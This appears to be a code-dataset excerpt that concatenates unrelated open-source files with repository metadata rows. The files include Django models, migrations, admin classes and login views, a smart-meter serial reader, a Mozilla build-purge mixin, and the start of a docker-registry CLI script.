helpers.validate_page_id(target_page_id)
return breadth_first_search(source_page_id, target_page_id, self)
def fetch_outgoing_links_count(self, page_ids):
"""Returns the sum of outgoing links of the provided page IDs.
Args:
page_ids: A list of page IDs whose outgoing links to count.
Returns:
int: The count of outgoing links.
"""
return self.fetch_links_count_helper(page_ids, 'outgoing_links_count')
def fetch_incoming_links_count(self, page_ids):
"""Returns the sum of incoming links for the provided page IDs.
Args:
page_ids: A list of page IDs whose incoming links to count.
Returns:
int: The count of incoming links.
"""
return self.fetch_links_count_helper(page_ids, 'incoming_links_count')
def fetch_links_count_helper(self, page_ids, incoming_or_outgoing_links_count):
"""Returns the sum of outgoing or incoming links for the provided page IDs.
Args:
page_ids: A list of page IDs whose outgoing or incoming links to count.
Returns:
int: The count of outgoing or incoming links.
"""
page_ids = str(tuple(page_ids)).replace(',)', ')')
# There is no need to escape the query parameters here since they are never user-defined.
query = 'SELECT SUM({0}) FROM links WHERE id IN {1};'.format(
incoming_or_outgoing_links_count, page_ids)
self.sdow_cursor.execute(query)
return self.sdow_cursor.fetchone()[0]
def fetch_outgoing_links(self, page_ids):
"""Returns a list of tuples of page IDs representing outgoing links from the list of provided
page IDs to other pages.
Args:
page_ids: A list of page IDs whose outgoing links to fetch.
Returns:
list(int, int): A lists of integer tuples representing outgoing links from the list of
provided page IDs to other pages.
"""
return self.fetch_links_helper(page_ids, 'outgoing_links')
def fetch_incoming_links(self, page_ids):
"""Returns a list of tuples of page IDs representing incoming links from the list of provided
page IDs to other pages.
Args:
page_ids: A list of page IDs whose incoming links to fetch.
Returns:
list(int, int): A lists of integer tuples representing incoming links from the list of
provided page IDs to other pages.
"""
return self.fetch_links_helper(page_ids, 'incoming_links')
def fetch_links_helper(self, page_ids, outcoming_or_incoming_links):
"""Helper function which handles duplicate logic for fetch_outgoing_links() and
fetch_incoming_links().
Args:
page_ids: A list of page IDs whose links to fetch.
outcoming_or_incoming_links: String which indicates whether to fetch outgoing ("source_id") or
incoming ("target_id") links.
Returns:
list(int, int): A cursor of a lists of integer tuples representing links from the list of
provided page IDs to other pages.
"""
# Convert the page IDs into a string surrounded by parentheses for insertion into the query
# below. The replace() bit is some hackery to handle Python printing a trailing ',' when there
# is only one key.
page_ids = str(tuple(page_ids)).replace(',)', ')')
# There is no need to escape the query parameters here since they are never user-defined.
query = 'SELECT id, {0} FROM links WHERE id IN {1};'.format(
outcoming_or_incoming_links, page_ids)
self.sdow_cursor.execute(query)
return self.sdow_cursor
def insert_result(self, search):
"""Inserts a new search result into the searches table.
Args:
results: A dictionary containing search information.
Returns:
None
"""
paths_count = len(search['paths'])
if paths_count == 0:
degrees_count = 'NULL'
else:
degrees_count = len(search['paths'][0]) - 1
# There is no need to escape the query parameters here since they are never user-defined.
query = 'INSERT INTO searches VALUES ({source_id}, {target_id}, {duration}, {degrees_count}, {paths_count}, CURRENT_TIMESTAMP);'.format(
source_id=search['source_id'],
target_id=search['target_id'],
duration=search['duration'],
degrees_count=degrees_count,
paths_count=paths_count,
)
self.searches_conn.execute(query)
self.searches_conn.commit()
| mit | -4,171,180,308,575,806,500 | 35.959839 | 140 | 0.688362 | false |
szendrei/django-unleashed | suorganizer/blog/migrations/0001_initial.py | 1 | 1238 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-21 02:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('organizer', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=63)),
('slug', models.SlugField(help_text='A label for URL config.', max_length=63, unique_for_month='pub_date')),
('text', models.TextField()),
('pub_date', models.DateField(auto_now_add=True, verbose_name='date published')),
('startups', models.ManyToManyField(related_name='blog_posts', to='organizer.Startup')),
('tags', models.ManyToManyField(related_name='blog_posts', to='organizer.Tag')),
],
options={
'ordering': ['-pub_date', 'title'],
'verbose_name': 'blog post',
'get_latest_by': 'pub_date',
},
),
]
| gpl-3.0 | 2,204,611,866,440,416,000 | 35.411765 | 124 | 0.550081 | false |
jialij-pdx/bpe_capstone | dashboard/admin.py | 1 | 2171 | # Bonneville Power Adminstration Front-End
# Copyright (C) 2015 Garrison Jenson, Matei Mitaru
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, US$
#
from django.contrib import admin
from dashboard.models import Dashboard
from query.models import Query
class DashboardAdmin(admin.ModelAdmin):
exclude = ('owner',)
def save_model(self, request, obj, form, change):
if not change:
obj.owner = request.user
obj.save()
def has_change_permission(self, request, obj=None):
has_class_permission = \
super(DashboardAdmin, self).has_change_permission(request, obj)
if not has_class_permission:
return False
if obj is not None and not request.user.is_superuser \
and request.user.id != obj.author.id:
return False
return True
class QueryAdmin(admin.ModelAdmin):
exclude = ('owner',)
def save_model(self, request, obj, form, change):
if not change:
obj.owner = request.user
obj.save()
def has_change_permission(self, request, obj=None):
has_class_permission = \
super(QueryAdmin, self).has_change_permission(request, obj)
if not has_class_permission:
return False
if obj is not None and not request.user.is_superuser \
and request.user.id != obj.author.id:
return False
return True
admin.site.register(Dashboard, DashboardAdmin)
admin.site.register(Query, QueryAdmin)
| gpl-2.0 | 2,076,370,343,440,777,000 | 32.921875 | 80 | 0.67941 | false |
synth3tk/the-blue-alliance | models/event.py | 1 | 11392 | from google.appengine.ext import ndb
import datetime
import json
import pytz
import re
from consts.district_type import DistrictType
from consts.event_type import EventType
class Event(ndb.Model):
"""
Events represent FIRST Robotics Competition events, both official and unofficial.
key_name is like '2010ct'
"""
name = ndb.StringProperty()
event_type_enum = ndb.IntegerProperty(required=True)
short_name = ndb.StringProperty(indexed=False) # Should not contain "Regional" or "Division", like "Hartford"
event_short = ndb.StringProperty(required=True, indexed=False) # Smaller abbreviation like "CT"
year = ndb.IntegerProperty(required=True)
event_district_enum = ndb.IntegerProperty()
start_date = ndb.DateTimeProperty()
end_date = ndb.DateTimeProperty()
venue = ndb.StringProperty(indexed=False) # Name of the event venue
venue_address = ndb.StringProperty(indexed=False) # Most detailed venue address (includes venue, street, and location separated by \n)
location = ndb.StringProperty(indexed=False) # in the format "locality, region, country". similar to Team.address
timezone_id = ndb.StringProperty() # such as 'America/Los_Angeles' or 'Asia/Jerusalem'
official = ndb.BooleanProperty(default=False) # Is the event FIRST-official?
first_eid = ndb.StringProperty() # from USFIRST
facebook_eid = ndb.StringProperty(indexed=False) # from Facebook
custom_hashtag = ndb.StringProperty(indexed=False) #Custom HashTag
website = ndb.StringProperty(indexed=False)
webcast_json = ndb.TextProperty(indexed=False) # list of dicts, valid keys include 'type' and 'channel'
matchstats_json = ndb.TextProperty(indexed=False) # for OPR, DPR, CCWM, etc.
rankings_json = ndb.TextProperty(indexed=False)
alliance_selections_json = ndb.TextProperty(indexed=False) # Formatted as: [{'picks': [captain, pick1, pick2, 'frc123', ...], 'declines':[decline1, decline2, ...] }, {'picks': [], 'declines': []}, ... ]
district_points_json = ndb.TextProperty(indexed=False)
created = ndb.DateTimeProperty(auto_now_add=True, indexed=False)
updated = ndb.DateTimeProperty(auto_now=True, indexed=False)
def __init__(self, *args, **kw):
# store set of affected references referenced keys for cache clearing
# keys must be model properties
self._affected_references = {
'key': set(),
'year': set(),
'event_district_abbrev': set(),
'event_district_key': set()
}
self._alliance_selections = None
self._awards = None
self._district_points = None
self._matches = None
self._matchstats = None
self._rankings = None
self._teams = None
self._venue_address_safe = None
self._webcast = None
self._updated_attrs = [] # Used in EventManipulator to track what changed
super(Event, self).__init__(*args, **kw)
@ndb.tasklet
def get_awards_async(self):
from database import award_query
self._awards = yield award_query.EventAwardsQuery(self.key_name).fetch_async()
@property
def alliance_selections(self):
"""
Lazy load alliance_selections JSON
"""
if self._alliance_selections is None:
try:
self._alliance_selections = json.loads(self.alliance_selections_json)
except Exception, e:
self._alliance_selections = None
return self._alliance_selections
@property
def alliance_teams(self):
"""
Load a list of team keys playing in elims
"""
alliances = self.alliance_selections
if alliances is None:
return []
teams = []
for alliance in alliances:
for pick in alliance['picks']:
teams.append(pick)
return teams
@property
def awards(self):
if self._awards is None:
self.get_awards_async().wait()
return self._awards
@property
def district_points(self):
"""
Lazy load district_points JSON
"""
if self._district_points is None:
try:
self._district_points = json.loads(self.district_points_json)
except Exception, e:
self._district_points = None
return self._district_points
@ndb.tasklet
def get_matches_async(self):
from database import match_query
self._matches = yield match_query.EventMatchesQuery(self.key_name).fetch_async()
@property
def matches(self):
if self._matches is None:
if self._matches is None:
self.get_matches_async().wait()
return self._matches
def local_time(self):
now = datetime.datetime.now()
if self.timezone_id is not None:
tz = pytz.timezone(self.timezone_id)
try:
now = now + tz.utcoffset(now)
except pytz.NonExistentTimeError: # may happen during DST
now = now + tz.utcoffset(now + datetime.timedelta(hours=1)) # add offset to get out of non-existant time
return now
def withinDays(self, negative_days_before, days_after):
if not self.start_date or not self.end_date:
return False
now = self.local_time()
after_start = self.start_date.date() + datetime.timedelta(days=negative_days_before) <= now.date()
before_end = self.end_date.date() + datetime.timedelta(days=days_after) >= now.date()
return (after_start and before_end)
@property
def now(self):
if self.timezone_id is not None:
return self.withinDays(0, 0)
else:
return self.within_a_day # overestimate what is "now" if no timezone
@property
def within_a_day(self):
return self.withinDays(-1, 1)
@property
def past(self):
return self.end_date.date() < datetime.date.today() and not self.within_a_day
@property
def future(self):
return self.start_date.date() > datetime.date.today() and not self.within_a_day
@property
def starts_today(self):
return self.start_date.date() == self.local_time().date()
@property
def ends_today(self):
return self.end_date.date() == self.local_time().date()
@ndb.tasklet
def get_teams_async(self):
from database import team_query
self._teams = yield team_query.EventTeamsQuery(self.key_name).fetch_async()
@property
def teams(self):
if self._teams is None:
self.get_teams_async().wait()
return self._teams
@ndb.toplevel
def prepAwardsMatchesTeams(self):
yield self.get_awards_async(), self.get_matches_async(), self.get_teams_async()
@ndb.toplevel
def prepTeams(self):
yield self.get_teams_async()
@ndb.toplevel
def prepTeamsMatches(self):
yield self.get_matches_async(), self.get_teams_async()
@property
def matchstats(self):
"""
Lazy load parsing matchstats JSON
"""
if self._matchstats is None:
try:
self._matchstats = json.loads(self.matchstats_json)
except Exception, e:
self._matchstats = None
return self._matchstats
@property
def rankings(self):
"""
Lazy load parsing rankings JSON
"""
if self._rankings is None:
try:
self._rankings = [[str(el) for el in row] for row in json.loads(self.rankings_json)]
except Exception, e:
self._rankings = None
return self._rankings
@property
def venue_or_venue_from_address(self):
if self.venue:
return self.venue
else:
try:
return self.venue_address.split('\r\n')[0]
except:
return None
@property
def venue_address_safe(self):
"""
Construct (not detailed) venue address if detailed venue address doesn't exist
"""
if not self.venue_address:
if not self.venue or not self.location:
self._venue_address_safe = None
else:
self._venue_address_safe = "{}\n{}".format(self.venue.encode('utf-8'), self.location.encode('utf-8'))
else:
self._venue_address_safe = self.venue_address.replace('\r\n', '\n')
return self._venue_address_safe
@property
def webcast(self):
"""
Lazy load parsing webcast JSON
"""
if self._webcast is None:
try:
self._webcast = json.loads(self.webcast_json)
except Exception, e:
self._webcast = None
return self._webcast
@property
def key_name(self):
"""
Returns the string of the key_name of the Event object before writing it.
"""
return str(self.year) + self.event_short
@property
def facebook_event_url(self):
"""
Return a string of the Facebook Event URL.
"""
return "http://www.facebook.com/event.php?eid=%s" % self.facebook_eid
@property
def details_url(self):
"""
Returns the URL pattern for the link to this Event on TBA
"""
return "/event/%s" % self.key_name
@property
def gameday_url(self):
"""
Returns the URL pattern for the link to watch webcasts in Gameday
"""
if self.webcast:
gameday_link = '/gameday'
view_num = 0
for webcast in self.webcast:
if view_num == 0:
gameday_link += '#'
else:
gameday_link += '&'
if 'type' in webcast and 'channel' in webcast:
gameday_link += 'view_' + str(view_num) + '=' + self.key_name + '-' + str(view_num + 1)
view_num += 1
return gameday_link
else:
return None
@property
def hashtag(self):
"""
Return the hashtag used for the event.
"""
if self.custom_hashtag:
return self.custom_hashtag
else:
return "frc" + self.event_short
# Depreciated, still here to keep GAE clean.
webcast_url = ndb.StringProperty(indexed=False)
@classmethod
def validate_key_name(self, event_key):
key_name_regex = re.compile(r'^[1-9]\d{3}[a-z]+[0-9]?$')
match = re.match(key_name_regex, event_key)
return True if match else False
@property
def event_district_str(self):
return DistrictType.type_names.get(self.event_district_enum, None)
@property
def event_district_abbrev(self):
return DistrictType.type_abbrevs.get(self.event_district_enum, None)
@property
def event_district_key(self):
district_abbrev = DistrictType.type_abbrevs.get(self.event_district_enum, None)
if district_abbrev is None:
return None
else:
return '{}{}'.format(self.year, district_abbrev)
@property
def event_type_str(self):
return EventType.type_names[self.event_type_enum]
@property
def display_name(self):
return self.name if self.short_name is None else self.short_name
| mit | -7,064,069,696,216,464,000 | 33.00597 | 207 | 0.597876 | false |
kennydude/django-shibboleth-remoteuser | quicktest.py | 1 | 4453 | """
Adapted from LA Times datadesk credit to Ben Welsh.
http://datadesk.latimes.com/posts/2012/06/test-your-django-app-with-travisci/
"""
import os
import sys
import django
from django.conf import settings
class QuickDjangoTest(object):
"""
A quick way to run the Django test suite without a fully-configured project.
Example usage:
>>> QuickDjangoTest('app1', 'app2')
Based on a script published by Lukasz Dziedzia at:
http://stackoverflow.com/questions/3841725/how-to-launch-tests-for-django-reusable-app
"""
DIRNAME = os.path.dirname(__file__)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
)
def __init__(self, *args, **kwargs):
self.apps = args
# Get the version of the test suite
self.version = self.get_test_version()
# Call the appropriate one
if self.version == 'supported':
self._supported_tests()
elif self.version == 'new':
self._new_tests()
else:
self._old_tests()
def get_test_version(self):
"""
Figure out which version of Django's test suite we have to play with.
"""
from django import VERSION
if VERSION[0] == 1 and VERSION[1] >= 2:
if VERSION[1] >= 7:
return 'new'
return 'supported'
else:
return 'old'
def _old_tests(self):
"""
Fire up the Django test suite from before version 1.2
"""
settings.configure(DEBUG = True,
DATABASE_ENGINE = 'sqlite3',
DATABASE_NAME = os.path.join(self.DIRNAME, 'database.db'),
INSTALLED_APPS = self.INSTALLED_APPS + self.apps
)
from django.test.simple import run_tests
failures = run_tests(self.apps, verbosity=1)
if failures:
sys.exit(failures)
def __configure_settings(self):
settings.configure(
DEBUG = True,
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(self.DIRNAME, 'database.db'),
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
},
INSTALLED_APPS = self.INSTALLED_APPS + self.apps,
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
),
ROOT_URLCONF = 'shib.urls',
)
def _new_tests(self):
"""
Fire up the Django test suite developed for version >= 1.7
"""
from django.test.utils import get_runner
self.__configure_settings()
django.setup()
from django.test.simple import DjangoTestSuiteRunner
failures = DjangoTestSuiteRunner().run_tests(self.apps, verbosity=1)
if failures:
sys.exit(failures)
def _supported_tests(self):
"""
Tests for django 1.2 > version < 1.7
"""
self.__configure_settings()
from django.test.simple import DjangoTestSuiteRunner
failures = DjangoTestSuiteRunner().run_tests(self.apps, verbosity=1)
if failures:
sys.exit(failures)
if __name__ == '__main__':
"""
What do when the user hits this file from the shell.
Example usage:
$ python quicktest.py app1 app2
"""
apps = sys.argv[1:]
QuickDjangoTest(*apps)
| mit | -5,399,791,073,414,517,000 | 32.51938 | 137 | 0.499439 | false |
FabricaSocial/sic | sic/auth/views.py | 1 | 2169 | # -*- coding: utf-8 -*-
from django.template import RequestContext
from django.shortcuts import render_to_response, redirect
from django.views.decorators.csrf import ensure_csrf_cookie
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login, logout
from django.core.context_processors import csrf
# Erros de Login
USUARIO_INATIVO = 1
LOGIN_INVALIDO = 2
def inicio(request):
if request.user.is_authenticated():
return redirect('/home/')
else:
return render_to_response(
'login.html',
context_instance=RequestContext(request)
)
def entrar(request):
usuario = request.POST['usuario']
senha = request.POST['senha']
login_usuario = authenticate(username=usuario, password=senha)
erro_login = None
csrf_token = {}
csrf_token.update(csrf(request))
if login_usuario is not None:
if login_usuario.last_login != login_usuario.date_joined:
if login_usuario.is_active:
login(request, login_usuario)
return redirect('/home/', csrf_token)
else:
erro_login = USUARIO_INATIVO
else:
login(request, login_usuario)
return redirect('/primeiro-login/', csrf_token)
else:
erro_login = LOGIN_INVALIDO
return render_to_response(
'login.html',
{'erro_login': erro_login, 'modal_erro': True},
context_instance=RequestContext(request)
)
@login_required(login_url='/login/')
@ensure_csrf_cookie
def alterar_senha(request):
senha = request.POST['senha']
usuario = request.user
usuario.set_password(senha)
usuario.save()
return render_to_response(
'home.html',
{'sucesso': True},
context_instance=RequestContext(request)
)
@login_required(login_url='/login/')
def sair(request):
logout(request)
return redirect('/')
@login_required(login_url='/login/')
def primeiro_login(request):
return render_to_response(
'home.html', {
'primeiro_login': True, },
context_instance=RequestContext(request)
)
| gpl-2.0 | 5,723,092,688,333,388,000 | 24.821429 | 66 | 0.642692 | false |
fabiocaccamo/django-admin-interface | admin_interface/migrations/0001_initial.py | 1 | 7501 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import colorfield.fields
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Theme',
fields=[
('id',
models.AutoField(
verbose_name='ID',
serialize=False,
auto_created=True,
primary_key=True)),
('name',
models.CharField(
default=b'Django',
max_length=50)),
('active',
models.BooleanField(
default=True)),
('title',
models.CharField(
default=b'Django administration',
max_length=50,
blank=True)),
('title_visible',
models.BooleanField(
default=True,
verbose_name=b'visible')),
('logo',
models.FileField(
upload_to=b'admin-interface/logo/',
blank=True)),
('logo_visible',
models.BooleanField(
default=True,
verbose_name=b'visible')),
('css_header_background_color',
colorfield.fields.ColorField(
default=b'#0C4B33',
help_text=b'#0C4B33',
max_length=10,
verbose_name=b'background color',
blank=True)),
('css_header_title_color',
colorfield.fields.ColorField(
default=b'#F5DD5D',
help_text=b'#F5DD5D',
max_length=10,
verbose_name=b'title color',
blank=True)),
('css_header_text_color',
colorfield.fields.ColorField(
default=b'#44B78B',
help_text=b'#44B78B',
max_length=10,
verbose_name=b'text color',
blank=True)),
('css_header_link_color',
colorfield.fields.ColorField(
default=b'#FFFFFF',
help_text=b'#FFFFFF',
max_length=10,
verbose_name=b'link color',
blank=True)),
('css_header_link_hover_color',
colorfield.fields.ColorField(
default=b'#C9F0DD',
help_text=b'#C9F0DD',
max_length=10,
verbose_name=b'link hover color',
blank=True)),
('css_module_background_color',
colorfield.fields.ColorField(
default=b'#44B78B',
help_text=b'#44B78B',
max_length=10,
verbose_name=b'background color',
blank=True)),
('css_module_text_color',
colorfield.fields.ColorField(
default=b'#FFFFFF',
help_text=b'#FFFFFF',
max_length=10,
verbose_name=b'text color',
blank=True)),
('css_module_link_color',
colorfield.fields.ColorField(
default=b'#FFFFFF',
help_text=b'#FFFFFF',
max_length=10,
verbose_name=b'link color',
blank=True)),
('css_module_link_hover_color',
colorfield.fields.ColorField(
default=b'#C9F0DD',
help_text=b'#C9F0DD',
max_length=10,
verbose_name=b'link hover color',
blank=True)),
('css_module_rounded_corners',
models.BooleanField(
default=True,
verbose_name=b'rounded corners')),
('css_generic_link_color',
colorfield.fields.ColorField(
default=b'#0C3C26',
help_text=b'#0C3C26',
max_length=10,
verbose_name=b'link color',
blank=True)),
('css_generic_link_hover_color',
colorfield.fields.ColorField(
default=b'#156641',
help_text=b'#156641',
max_length=10,
verbose_name=b'link hover color',
blank=True)),
('css_save_button_background_color',
colorfield.fields.ColorField(
default=b'#0C4B33',
help_text=b'#0C4B33',
max_length=10,
verbose_name=b'background color',
blank=True)),
('css_save_button_background_hover_color',
colorfield.fields.ColorField(
default=b'#0C3C26',
help_text=b'#0C3C26',
max_length=10,
verbose_name=b'background hover color',
blank=True)),
('css_save_button_text_color',
colorfield.fields.ColorField(
default=b'#FFFFFF',
help_text=b'#FFFFFF',
max_length=10,
verbose_name=b'text color',
blank=True)),
('css_delete_button_background_color',
colorfield.fields.ColorField(
default=b'#BA2121',
help_text=b'#BA2121',
max_length=10,
verbose_name=b'background color',
blank=True)),
('css_delete_button_background_hover_color',
colorfield.fields.ColorField(
default=b'#A41515',
help_text=b'#A41515',
max_length=10,
verbose_name=b'background hover color',
blank=True)),
('css_delete_button_text_color',
colorfield.fields.ColorField(
default=b'#FFFFFF',
help_text=b'#FFFFFF',
max_length=10,
verbose_name=b'text color',
blank=True)),
('css',
models.TextField(
blank=True)),
('list_filter_dropdown',
models.BooleanField(
default=False)),
],
options={
'verbose_name': 'Theme',
'verbose_name_plural': 'Themes',
},
),
]
| mit | -5,121,611,831,423,216,000 | 39.766304 | 63 | 0.383282 | false |
Crossbow78/mbsolget | python/mbsolget_p1_a1.py | 1 | 2056 | #
# MBSolget P1 Telegram Catch
# DSMR 4
#
version = "v1.00"
import sys
import os
import stat
import serial
import datetime
import locale
###############################################################################################################
# Main program
###############################################################################################################
#Initialize
p1_telegram = False
p1_timestamp = ""
p1_teller = 0
p1_log = True
p1_logfile = os.getenv('WORKDIR', "/home/pi/tmp") + "/p1_temp.log"
#Set COM port config
ser = serial.Serial()
ser.baudrate = 115200
ser.bytesize = serial.EIGHTBITS
ser.parity = serial.PARITY_NONE
ser.stopbits = serial.STOPBITS_ONE
ser.xonxoff = 1
ser.rtscts = 0
ser.timeout = 20
ser.port = os.getenv('P1PORT', "/dev/ttyUSB0")
#Show startup arguments
print ("MBSolget P1 Telegram Catch %s" % version)
print ("Control-C om af te breken")
print ("Poort: (%s)" % (ser.name) )
#Open COM port
try:
ser.open()
except:
sys.exit ("Fout bij het openen van poort %s. " % ser.name)
while p1_log:
p1_line = ''
try:
p1_raw = ser.readline()
except:
ser.close()
sys.exit ("Fout bij het lezen van poort %s. " % ser.name )
p1_str = p1_raw
p1_str = str(p1_raw, "utf-8")
p1_line = p1_str.strip()
print (p1_line)
if p1_line[0:1] == "/":
p1_telegram = True
p1_teller = p1_teller + 1
f=open(p1_logfile, "w")
elif p1_line[0:1] == "!":
if p1_telegram:
p1_teller = 0
p1_telegram = False
p1_log = False
f.write (p1_line)
f.write ('\r\n')
f.close()
os.chmod(p1_logfile, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH )
if p1_telegram:
f.write (p1_line)
f.write ('\r\n')
#Close port and show status
try:
ser.close()
except:
sys.exit ("Fout bij het sluiten van %s. Programma afgebroken." % ser.name )
| gpl-3.0 | -3,780,634,384,614,253,600 | 24.7 | 122 | 0.510214 | false |
simar7/build-mozharness | mozharness/mozilla/purge.py | 1 | 5896 | #!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# ***** END LICENSE BLOCK *****
"""Purge/clobber support
"""
# Figure out where our external_tools are
# These are in a sibling directory to the 'mozharness' module
import os
import mozharness
external_tools_path = os.path.join(
os.path.abspath(os.path.dirname(os.path.dirname(mozharness.__file__))),
'external_tools',
)
from mozharness.base.log import ERROR
# PurgeMixin {{{1
# Depends on ScriptMixin for self.run_command,
# and BuildbotMixin for self.buildbot_config and self.query_is_nightly()
class PurgeMixin(object):
purge_tool = os.path.join(external_tools_path, 'purge_builds.py')
clobber_tool = os.path.join(external_tools_path, 'clobberer.py')
default_skips = ['info', 'rel-*', 'tb-rel-*']
default_maxage = 14
default_periodic_clobber = 7 * 24
def purge_builds(self, basedirs=None, min_size=None, skip=None, max_age=None):
# Try clobbering first
c = self.config
dirs = self.query_abs_dirs()
if 'clobberer_url' in c:
self.clobberer()
min_size = min_size or c['purge_minsize']
max_age = max_age or c.get('purge_maxage') or self.default_maxage
skip = skip or c.get('purge_skip') or self.default_skips
if not basedirs:
# some platforms using this method (like linux) supply more than
# one basedir
basedirs = []
basedirs.append(os.path.dirname(dirs['base_work_dir']))
if self.config.get('purge_basedirs'):
basedirs.extend(self.config.get('purge_basedirs'))
cmd = []
if self._is_windows():
# add the python interpreter explicitly
try:
cmd.append(self.query_python_path())
except AttributeError:
# we are not inheriting from VirtualenvMixin
cmd.append(self.query_exe('python'))
# Add --dry-run if you don't want to do this for realz
cmd.extend([self.purge_tool, '-s', str(min_size)])
if max_age:
cmd.extend(['--max-age', str(max_age)])
for s in skip:
cmd.extend(['--not', s])
cmd.extend(basedirs)
# purge_builds.py can also clean up old shared hg repos if we set
# HG_SHARE_BASE_DIR accordingly
env = {'PATH': os.environ.get('PATH')}
share_base = c.get('vcs_share_base', os.environ.get("HG_SHARE_BASE_DIR", None))
if share_base:
env['HG_SHARE_BASE_DIR'] = share_base
retval = self.run_command(cmd, env=env)
if retval != 0:
self.fatal("failed to purge builds", exit_code=2)
def clobberer(self):
c = self.config
dirs = self.query_abs_dirs()
if not self.buildbot_config:
self.fatal("clobberer requires self.buildbot_config (usually from $PROPERTIES_FILE)")
periodic_clobber = c.get('periodic_clobber') or self.default_periodic_clobber
clobberer_url = c['clobberer_url']
builddir = os.path.basename(dirs['base_work_dir'])
branch = self.buildbot_config['properties']['branch']
buildername = self.buildbot_config['properties']['buildername']
slave = self.buildbot_config['properties']['slavename']
master = self.buildbot_config['properties']['master']
cmd = []
if self._is_windows():
# add the python interpreter explicitly
try:
cmd.append(self.query_python_path())
except AttributeError:
# we are not inheriting from VirtualenvMixin
cmd.append(self.query_exe('python'))
# Add --dry-run if you don't want to do this for realz
cmd.extend([self.clobber_tool])
# TODO configurable list
cmd.extend(['-s', 'scripts'])
cmd.extend(['-s', 'logs'])
cmd.extend(['-s', 'buildprops.json'])
cmd.extend(['-s', 'token'])
cmd.extend(['-s', 'oauth.txt'])
if periodic_clobber:
cmd.extend(['-t', str(periodic_clobber)])
cmd.extend([clobberer_url, branch, buildername, builddir, slave, master])
error_list = [{
'substr': 'Error contacting server', 'level': ERROR,
'explanation': 'Error contacting server for clobberer information.'
}]
retval = self.retry(self.run_command, attempts=3, good_statuses=(0,), args=[cmd],
kwargs={'cwd':os.path.dirname(dirs['base_work_dir']),
'error_list':error_list})
if retval != 0:
self.fatal("failed to clobber build", exit_code=2)
def clobber(self, always_clobber_dirs=None):
""" Mozilla clobberer-type clobber.
"""
c = self.config
if c.get('is_automation'):
# Nightly builds always clobber
do_clobber = False
if self.query_is_nightly():
self.info("Clobbering because we're a nightly build")
do_clobber = True
if c.get('force_clobber'):
self.info("Clobbering because our config forced us to")
do_clobber = True
if do_clobber:
super(PurgeMixin, self).clobber()
else:
# Delete the upload dir so we don't upload previous stuff by
# accident
if always_clobber_dirs is None:
always_clobber_dirs = []
for path in always_clobber_dirs:
self.rmtree(path)
# run purge_builds / check clobberer
self.purge_builds()
else:
super(PurgeMixin, self).clobber()
| mpl-2.0 | 3,254,746,533,301,541,400 | 37.535948 | 97 | 0.579715 | false |
qnib/python-docker-reg | test.py | 1 | 7451 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Usage:
cli.py [options]
cli.py (-h | --help)
cli.py --version
Options:
--local-url <url> URL of local docker-registry (default: $DOCKER_HOST)
--local-port <int> Port of local docker-registry [default: 5000]
--remote-url <url> URL of remote registry.
--remote-port <int> Port of docker-registry [default: 5000]
--dry-run just print images:tags
General Options:
-h --help Show this screen.
--version Show version.
--loglevel, -L=<str> Loglevel [default: WARN]
(ERROR, CRITICAL, WARN, INFO, DEBUG)
--log2stdout, -l Log to stdout, otherwise to logfile. [default: True]
--logfile, -f=<path> Logfile to log to (default: <scriptname>.log)
--cfg, -c=<path> Configuration file.
"""
from ConfigParser import RawConfigParser, NoOptionError
import re
import os
import logging
import sys
from pprint import pprint
import docker_reg
try:
from docopt import docopt
except ImportError:
HAVE_DOCOPT = False
else:
HAVE_DOCOPT = True
__author__ = 'Christian Kniep <[email protected]>'
__license__ = 'Apache License 2.0'
class QnibConfig(RawConfigParser):
""" Class to abstract config and options
"""
specials = {
'TRUE': True,
'FALSE': False,
'NONE': None,
}
def __init__(self, opt):
""" init """
RawConfigParser.__init__(self)
self.logformat = '%(asctime)-15s %(levelname)-5s [%(module)s] %(message)s'
if opt is None:
self._opt = {
"--log2stdout": False,
"--logfile": None,
"--loglevel": "ERROR",
}
else:
self._opt = opt
self.loglevel = opt['--loglevel']
self.logformat = '%(asctime)-15s %(levelname)-5s [%(module)s] %(message)s'
self.log2stdout = opt['--log2stdout']
if self.loglevel is None and opt.get('--cfg') is None:
print "please specify loglevel (-L)"
sys.exit(0)
self.eval_cfg()
self.eval_opt()
self.set_logging()
logging.info("SetUp of QnibConfig is done...")
def do_get(self, section, key, default=None):
""" Also lent from: https://github.com/jpmens/mqttwarn
"""
try:
val = self.get(section, key)
if val.upper() in self.specials:
return self.specials[val.upper()]
return ast.literal_eval(val)
except NoOptionError:
return default
except ValueError: # e.g. %(xxx)s in string
return val
except:
raise
return val
def config(self, section):
''' Convert a whole section's options (except the options specified
explicitly below) into a dict, turning
[config:mqtt]
